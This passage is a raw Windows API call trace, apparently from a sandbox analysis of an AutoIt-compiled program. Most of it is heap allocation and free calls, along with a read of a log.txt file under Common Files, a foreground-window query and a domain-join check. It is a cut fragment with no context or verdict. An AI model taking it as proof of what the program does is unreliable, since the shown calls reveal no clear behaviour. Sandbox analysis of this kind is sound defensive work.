Flags=0x0, Size=0x18) returned 0xec1c08 [0254.703] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4310 [0254.703] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xec1c28 [0254.703] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4310 | out: hHeap=0xc60000) returned 1 [0254.703] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xec1c28 | out: hHeap=0xc60000) returned 1 [0254.703] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xec1c08 | out: hHeap=0xc60000) returned 1 [0254.703] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed42c0 | out: hHeap=0xc60000) returned 1 [0254.703] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed42b0 | out: hHeap=0xc60000) returned 1 [0254.703] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec5e8 [0254.703] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe76b60 [0254.703] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe76b30 [0254.703] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76b48 [0254.703] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe76b18 [0254.703] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe76ae8 [0254.704] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76b00 [0254.704] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe76ad0 [0254.704] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe76aa0 [0254.704] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed42b0 [0254.704] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed42c0 [0254.704] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed42c0 | out: hHeap=0xc60000) returned 1 [0254.704] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed42b0 | out: hHeap=0xc60000) returned 1 [0254.704] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76b60 | out: hHeap=0xc60000) returned 1 [0254.704] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76b48 | out: hHeap=0xc60000) returned 1 [0254.704] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76b30 | out: hHeap=0xc60000) returned 1 [0254.704] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76b18 | out: hHeap=0xc60000) returned 1 [0254.704] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76b00 | out: hHeap=0xc60000) returned 1 [0254.704] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76ae8 | out: hHeap=0xc60000) returned 1 [0254.704] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76ad0 | out: hHeap=0xc60000) returned 1 [0254.704] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76aa0 | out: hHeap=0xc60000) returned 1 [0254.704] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec5e8 | out: hHeap=0xc60000) returned 1 [0254.704] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe819b8 | out: hHeap=0xc60000) returned 1 [0254.704] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe767e8 | out: hHeap=0xc60000) returned 1 [0254.704] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76800 | out: hHeap=0xc60000) returned 1 [0254.704] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4220 | out: hHeap=0xc60000) returned 1 [0254.704] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec408 | out: hHeap=0xc60000) returned 1 [0254.704] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76ba8 | out: hHeap=0xc60000) returned 1 [0254.704] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76b90 | out: hHeap=0xc60000) returned 1 [0254.704] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76bc0 | out: hHeap=0xc60000) returned 1 [0254.704] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76bd8 | out: hHeap=0xc60000) returned 1 [0254.705] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76bf0 | out: hHeap=0xc60000) returned 1 [0254.705] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd82430 | out: hHeap=0xc60000) returned 1 [0254.705] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xcb2140 | out: hHeap=0xc60000) returned 1 [0254.705] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4340 | out: hHeap=0xc60000) returned 1 [0254.705] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe769b0 | out: hHeap=0xc60000) returned 1 [0254.705] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76998 | out: hHeap=0xc60000) returned 1 [0254.705] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed42a0 | out: hHeap=0xc60000) returned 1 [0254.705] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec5c0 | out: hHeap=0xc60000) returned 1 [0254.705] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe767a0 | out: hHeap=0xc60000) returned 1 [0254.705] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe767d0 | out: hHeap=0xc60000) returned 1 [0254.705] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4230 | out: hHeap=0xc60000) returned 1 [0254.705] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec430 | out: hHeap=0xc60000) returned 1 [0254.705] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76980 | out: hHeap=0xc60000) returned 1 [0254.705] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76968 | out: hHeap=0xc60000) returned 1 [0254.705] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec598 | out: hHeap=0xc60000) returned 1 [0254.705] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4290 | out: hHeap=0xc60000) returned 1 [0254.705] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec570 | out: hHeap=0xc60000) returned 1 [0254.705] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76920 | out: hHeap=0xc60000) returned 1 [0254.705] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76908 | out: hHeap=0xc60000) returned 1 [0254.706] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec4f8 | out: hHeap=0xc60000) returned 1 [0254.706] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4270 | out: hHeap=0xc60000) returned 1 [0254.706] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec4d0 | out: hHeap=0xc60000) returned 1 [0254.706] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76878 | out: hHeap=0xc60000) returned 1 [0254.706] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe767b8 | out: hHeap=0xc60000) returned 1 [0254.706] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4240 | out: hHeap=0xc60000) returned 1 [0254.706] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec458 | out: hHeap=0xc60000) returned 1 [0254.706] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76950 | out: hHeap=0xc60000) returned 1 [0254.706] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76938 | out: hHeap=0xc60000) returned 1 [0254.706] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec548 | out: hHeap=0xc60000) returned 1 [0254.706] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4280 | out: hHeap=0xc60000) returned 1 [0254.706] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec520 | out: hHeap=0xc60000) returned 1 [0254.706] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe768a8 | out: hHeap=0xc60000) returned 1 [0254.706] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76890 | out: hHeap=0xc60000) returned 1 [0254.706] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4250 | out: hHeap=0xc60000) returned 1 [0254.706] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec480 | out: hHeap=0xc60000) returned 1 [0254.706] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe768d8 | out: hHeap=0xc60000) returned 1 [0254.706] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe768c0 | out: hHeap=0xc60000) returned 1 [0254.706] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4260 | out: hHeap=0xc60000) returned 1 [0254.706] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec4a8 | out: hHeap=0xc60000) returned 1 [0254.706] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76830 | out: hHeap=0xc60000) returned 1 [0254.706] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe768f0 | out: hHeap=0xc60000) returned 1 [0254.706] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed41f0 | out: hHeap=0xc60000) returned 1 [0254.706] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4200 | out: hHeap=0xc60000) returned 1 [0254.706] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4210 | out: hHeap=0xc60000) returned 1 [0254.706] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec3b8 | out: hHeap=0xc60000) returned 1 [0254.706] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76860 | out: hHeap=0xc60000) returned 1 [0254.706] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76848 | out: hHeap=0xc60000) returned 1 [0254.706] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76818 | out: hHeap=0xc60000) returned 1 [0254.706] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec3e0 | out: hHeap=0xc60000) returned 1 [0254.706] PeekMessageW (in: lpMsg=0x87f83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f83c) returned 0 [0254.707] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81970 | out: hHeap=0xc60000) returned 1 [0254.707] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76758 | out: hHeap=0xc60000) returned 1 [0254.707] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe766f8 | out: hHeap=0xc60000) returned 1 [0254.707] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed41d0 | out: hHeap=0xc60000) returned 1 [0254.707] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec368 | out: hHeap=0xc60000) returned 1 [0254.707] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76788 | out: hHeap=0xc60000) returned 1 [0254.707] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76770 | out: hHeap=0xc60000) returned 1 [0254.707] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed41e0 | out: hHeap=0xc60000) returned 1 [0254.707] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec390 | out: hHeap=0xc60000) returned 1 [0254.707] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe764d0 | out: hHeap=0xc60000) returned 1 [0254.707] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4160 | out: hHeap=0xc60000) returned 1 [0254.707] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed41c0 | out: hHeap=0xc60000) returned 1 [0254.707] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec318 | out: hHeap=0xc60000) returned 1 [0254.707] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe764e8 | out: hHeap=0xc60000) returned 1 [0254.707] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76518 | out: hHeap=0xc60000) returned 1 [0254.707] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec340 | out: hHeap=0xc60000) returned 1 [0254.707] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.707] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec340 [0254.707] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76518 [0254.707] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed41c0 [0254.707] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4160 [0254.707] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4160 | out: hHeap=0xc60000) returned 1 [0254.707] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed41c0 | out: hHeap=0xc60000) returned 1 [0254.707] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe764e8 [0254.707] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed41c0 [0254.707] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed41c0 | out: hHeap=0xc60000) returned 1 [0254.707] CreateSolidBrush (color=0x0) returned 0xffffffffbe1001e2 [0254.707] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe764d0 [0254.708] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe76770 [0254.708] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76518 | out: hHeap=0xc60000) returned 1 [0254.708] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe764e8 | out: hHeap=0xc60000) returned 1 [0254.708] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec340 | out: hHeap=0xc60000) returned 1 [0254.708] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.708] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec340 [0254.708] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe764e8 [0254.708] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed41c0 [0254.708] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4160 [0254.708] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4160 | out: hHeap=0xc60000) returned 1 [0254.708] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed41c0 | out: hHeap=0xc60000) returned 1 [0254.708] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76518 [0254.708] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed41c0 [0254.708] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed41c0 | out: hHeap=0xc60000) returned 1 [0254.708] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe764e8 | out: hHeap=0xc60000) returned 1 [0254.708] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76518 | out: hHeap=0xc60000) returned 1 [0254.708] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec340 | out: hHeap=0xc60000) returned 1 [0254.708] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.708] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed41c0 [0254.708] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec340 [0254.708] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76518 [0254.708] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4160 [0254.708] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe764e8 [0254.708] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed41e0 [0254.708] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xd82430 [0254.708] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76788 [0254.708] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed41d0 [0254.708] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe81970 [0254.708] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76788 | out: hHeap=0xc60000) returned 1 [0254.708] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd82430 | out: hHeap=0xc60000) returned 1 [0254.709] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed41e0 | out: hHeap=0xc60000) returned 1 [0254.709] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4160 | out: hHeap=0xc60000) returned 1 [0254.709] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76788 [0254.709] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe766f8 [0254.709] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4160 [0254.709] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xeb4ee8 [0254.709] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10000) returned 0xef2e60 [0254.709] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76758 [0254.709] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed41e0 [0254.709] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x600 [0254.710] SetFilePointerEx (in: hFile=0x600, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.710] SetFilePointerEx (in: hFile=0x600, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f66c | out: lpNewFilePointer=0x0) returned 1 [0254.710] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4210 [0254.712] CharUpperBuffW (in: lpsz="_FILECOUNTLINES", cchLength=0xf | out: lpsz="_FILECOUNTLINES") returned 0xf [0254.712] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec390 | out: hHeap=0xc60000) returned 1 [0254.712] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4200 | out: hHeap=0xc60000) returned 1 [0254.722] SendMessageW (hWnd=0x30166, Msg=0xb1, wParam=0xf4240, lParam=0xf423f) returned 0x1 [0254.722] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76848 | out: hHeap=0xc60000) returned 1 [0254.723] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed41d0 | out: hHeap=0xc60000) returned 1 [0254.723] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76788 | out: hHeap=0xc60000) returned 1 [0254.723] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xf0aea0 | out: hHeap=0xc60000) returned 1 [0254.723] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4200 | out: hHeap=0xc60000) returned 1 [0254.723] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76818 | out: hHeap=0xc60000) returned 1 [0254.723] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe766f8 | out: hHeap=0xc60000) returned 1 [0254.723] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec318 | out: hHeap=0xc60000) returned 1 [0254.723] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 1 [0254.723] TranslateMessage (lpMsg=0x87fa94) returned 0 [0254.723] DispatchMessageW (lpMsg=0x87fa94) returned 0xffffffff [0254.723] GetForegroundWindow () returned 0x100ea [0254.723] GetWindowLongW (hWnd=0x100ea, nIndex=-21) returned 0 [0254.723] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.723] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4200 [0254.723] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed41d0 [0254.723] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec318 [0254.723] CharUpperBuffW (in: lpsz="DOMAINCHECK", cchLength=0xb | out: lpsz="DOMAINCHECK") returned 0xb [0254.723] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec318 | out: hHeap=0xc60000) returned 1 [0254.723] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed41d0 | out: hHeap=0xc60000) returned 1 [0254.723] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe766f8 [0254.723] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe81970 [0254.723] PeekMessageW (in: lpMsg=0x87f674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f674) returned 0 [0254.723] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed41d0 [0254.723] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed41d0 | out: hHeap=0xc60000) returned 1 [0254.723] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec318 [0254.724] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76818 [0254.724] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed41d0 [0254.724] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76818 | out: hHeap=0xc60000) returned 1 [0254.724] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xed2d48 [0254.724] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76818 [0254.724] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec368 [0254.724] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76788 [0254.724] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed41b0 [0254.724] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76788 | out: hHeap=0xc60000) returned 1 [0254.724] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xed2d80 [0254.724] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76788 [0254.724] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec390 [0254.724] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76848 [0254.724] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed41e0 [0254.724] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76848 | out: hHeap=0xc60000) returned 1 [0254.724] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xed2db8 [0254.724] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76848 [0254.724] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec520 [0254.724] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76860 [0254.724] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4260 [0254.724] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76860 | out: hHeap=0xc60000) returned 1 [0254.724] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xed2df0 [0254.724] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76860 [0254.724] PeekMessageW (in: lpMsg=0x87f674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f674) returned 0 [0254.724] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec4d0 [0254.724] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe768f0 [0254.725] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4250 [0254.725] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe768f0 | out: hHeap=0xc60000) returned 1 [0254.725] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec3e0 [0254.725] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe768f0 [0254.725] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76938 [0254.725] PeekMessageW (in: lpMsg=0x87f674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f674) returned 0 [0254.725] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4340 [0254.725] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4210 [0254.725] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe819b8 [0254.725] CharUpperBuffW (in: lpsz="_WINAPI_NETGETJOININFORMATION", cchLength=0x1d | out: lpsz="_WINAPI_NETGETJOININFORMATION") returned 0x1d [0254.725] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe819b8 | out: hHeap=0xc60000) returned 1 [0254.725] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4210 | out: hHeap=0xc60000) returned 1 [0254.725] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe76908 [0254.725] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4210 [0254.725] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76830 [0254.725] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4210 | out: hHeap=0xc60000) returned 1 [0254.725] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec3b8 [0254.725] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe768c0 [0254.725] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4210 [0254.725] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe768c0 | out: hHeap=0xc60000) returned 1 [0254.725] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec4a8 [0254.725] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe768c0 [0254.725] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe768d8 [0254.725] RtlAllocateHeap 